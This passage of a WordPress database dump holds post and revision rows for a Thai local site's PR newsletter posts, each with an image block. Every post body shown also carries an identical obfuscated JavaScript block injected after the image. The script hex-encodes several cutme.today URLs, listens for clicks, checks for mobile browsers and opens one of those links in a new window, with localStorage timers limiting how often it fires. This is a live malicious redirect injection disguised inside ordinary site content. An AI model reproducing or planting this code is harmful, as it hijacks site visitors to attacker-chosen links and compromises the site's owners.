_0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วารสารประชาสัมพันธ์','','publish','closed','closed','','%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c-15','','','2024-07-27 22:47:43','2024-07-27 15:47:43','',0,'http://pakhaeng.ssk.in.th/?p=230',0,'post','',0),
(231,1,'2024-07-27 22:47:17','2024-07-27 15:47:17','','14-2566','','inherit','','closed','','14-2566-2','','','2024-07-27 22:47:17','2024-07-27 15:47:17','',230,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/14-2566-1.png',0,'attachment','image/png',0),
(232,1,'2024-07-27 22:47:28','2024-07-27 15:47:28','','14-2566','','inherit','','closed','','14-2566-3','','','2024-07-27 22:47:28','2024-07-27 15:47:28','',230,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/14-2566-2.png',0,'attachment','image/png',0),
(233,1,'2024-07-27 22:47:42','2024-07-27 15:47:42','<!-- wp:image {\"id\":232,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/14-2566-2-724x1024.png\" alt=\"\" class=\"wp-image-232\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วารสารประชาสัมพันธ์','','inherit','closed','closed','','230-revision-v1','','','2024-07-27 22:47:42','2024-07-27 15:47:42','',230,'http://pakhaeng.ssk.in.th/?p=233',0,'revision','',0),
(234,1,'2024-07-27 22:48:13','2024-07-27 15:48:13','<!-- wp:image {\"id\":235,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/15-2566-1-724x1024.png\" alt=\"\" class=\"wp-image-235\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','วารสารประชาสัมพันธ์','','publish','closed','closed','','%e0%b8%a7%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%b2%e0%b8%a3%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%8a%e0%b8%b2%e0%b8%aa%e0%b8%b1%e0%b8%a1%e0%b8%9e%e0%b8%b1%e0%b8%99%e0%b8%98%e0%b9%8c-16','','','2024-07-27 22:48:14','2024-07-27 15:48:14','',0,'http://pakhaeng.ssk.in.th/?p=234',0,'post','',0),
(235,1,'2024-07-27 22:48:03','2024-07-27 15:48:03','','15-2566','','inherit','','closed','','15-2566-2','','','2024-07-27 22:48:03','2024-07-27 15:48:03','',234,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/15-2566-1.png',0,'attachment','image/png',0),
(236,1,'2024-07-27 22:48:13','2024-07-27 15:48:13','<!-- wp:image {\"id\":235,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/15-2566-1-724x1024.png\" alt=\"\" class=\"wp-image-235\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return 